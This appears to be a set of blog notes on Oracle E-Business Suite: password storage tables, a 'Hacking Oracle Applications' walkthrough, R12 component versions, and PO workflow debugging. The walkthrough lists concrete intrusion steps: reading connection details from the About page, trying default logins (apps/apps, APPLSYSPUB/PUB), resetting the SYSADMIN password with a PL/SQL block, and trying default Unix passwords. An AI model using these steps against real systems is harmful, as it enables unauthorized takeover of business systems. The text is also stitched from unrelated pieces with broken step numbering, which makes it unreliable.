Oracle APPS Password Security

Oracle applications 11i Implementations has a Security weakness. Oracle application 11i passwords are stored in the database. Apps password stores in2 tables: FND_USER and FND_ORACLE_USERID tables Stores internal oracle applications database accounts. The APPS and APPLSYS database accounts must always have the same password

The APPS.fnd_user table has all applications accounts and there Are 2 Password columns provide for ENCRYPTION.

ENCRYPTED_FOUNDATION_PASSWORD

1. ENCRYPTED_USER_PASSWORD

The above 2 columns any also contains 1 of the String Values
1.External: Means User Authentication is Delegated So password is not stored in the FND_USER Table

2.INVALID Some Default Oracle apps Accounts access is blocked by directly updating the FND_USER Table.

3.X Means like INVALID

4.ZG If the Encryption Algorithm fails the Error MSG is stord in password column

The Passwords in FND_ORACLE_USERID maintained independent of the database, So Any changes to the account passwords using ALTER USER statements not reflect in the table. If you want change the passwords in FND_ORACLE_USERID can done by utility called FNDCPASS or sysadmin “ORACLE Form”

The Oracle Application passwords can be 1 to 100 chars length and longer Passwords are truncated at 100 Chars.

Oracle Apps passwords Encryption done by APPS.FND_WEB_SEC Or JAVA Class Oracle.apps.fnd.security.websessionManagerProc
Oracle.apps.fnd.security.AolSecurity
Oracle.apps.fnd.security.AolSecurityPrivate

You can find this class information at $JAVA_TOP Directory.

You can download the class and Using Java class Converter You can see how the code is written. The Actual Encryption and Decryption calls are in the “oracle.apps.fnd.security.AolSecurityPrivate” Java class. The Guest account Password is stores in System Profile. You can get by using

Select APPS.FND_PROFILE.VALUE('GUEST_USER_PWD') from dual.

Traceing TNS Entries(Hacking Oracle Applications)
How to get Tns entries from front page of oracle application Screen.

For more visibility Click on Image

Step 1: Click on About link Page. Then your are able to see the following screen
Step 2: Click on Page Context Tab


For more visibility Click on Image



You are able to Get following Information.
1) Data base Name (Hostname)
2)Port no#
3)SID Name
Step 4: Build Tns Entries With following method and Paste it in local machine
Try to connect with default Password apps/apps


"SID"=
(DESCRIPTION =
(ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)
(HOST = "Host Name")
(PORT = "Port number")) )
(CONNECT_DATA =
(SERVICE_NAME ="SID" )
) )

• Connect with Default username/password :

APPLSYSPUB/PUB
This username/password is hard-coded in FND_TOP/secure/appsweb.cfg file.

• Once you get the DataBase access Use following Select statement gets the front URL access

.

• select HOME_URL from icx_parameters

You will get Front-end access login Screen.
By useing APPS.FND_WEB_SEC package change the SYSADMIN or user password At SQL Prompt.
Example 1:
--Change Sysadmin Password from PL/SQL
set serverout on
declare
ret varchar2(200);
begin
ret := fnd_web_sec.change_password('SYSADMIN',
'Welcome1');
dbms_output.put_line('Result of Package'||ret);
---Y Means Success Else Fail.
end;
Commit;

Step 4: Finally Click on Java System Properties Scroll Down the Page. Your able to see the Unix Login user name(Back End User Access)
Step 5:Try to connect unix server with Default Password.

The technology stack for Release 12

The technology stack for Release 12 takes advantage of the latest Oracle technologies for the database and application server tiers.These components are installed in the ORACLE_HOME directories, while other components are rehosted in the APPL_TOP

Oracle Technology Components

Oracle Database 10g - 10.2
XDK (Database) - 10.1.0.4
XDB - 10.1.0.4
XDK (Application tier) - 10.1.3
Oracle HTTP Client - 10.1.3
Oracle Application Server - 10.1.2 and 10.1.3
Developer Client Libraries - 10.1.0.4.2
Oracle Database iAS Client Libraries - 10.1.0.4.2
Oracle HTTP Server - 10.1.3
Oracle JDeveloper - 10.1.3
OracleAS Discoverer 10g - 10.1.2.0.2
OJSP - 2.0

The Rehosted Components are:

BI Beans - 3.1
JDBC - 10.2
JDK for Web tier - 5.0
JDK for concurrent processing tier - 5.0
Sun Java Plug-in - 5.0

The Non-Embedded Applications Integration Components:

These components all provide newer versions of Java-related features and technologies.

OracleAS 10g Portal - 10.1.4
OracleAS 10g Single Sign-On and Oracle Internet Directory - 10.1.2.0.2
Oracle Collaboration Suite - 10g Release 1
Oracle Enterprise Manager - 10g Release 1

PO Workflow Debug

The following is exceptionally useful when trying to diagnose problem encountered during workflow execution.This can be exceptionally useful in determining why a section of code is failing.

Step 1) clearing any existing debug entries

truncate table po_wf_debug

Step2) Set Profile Option ‘PO: Set Debug Workflow ON’ to Yes, then reproduce the issue

Step 3)

SELECT document_id,

document_number,

authorization_status,

debug_message

FROM

po_wf_debug ;

optionally add itemtype and itemkey to limit the data returned.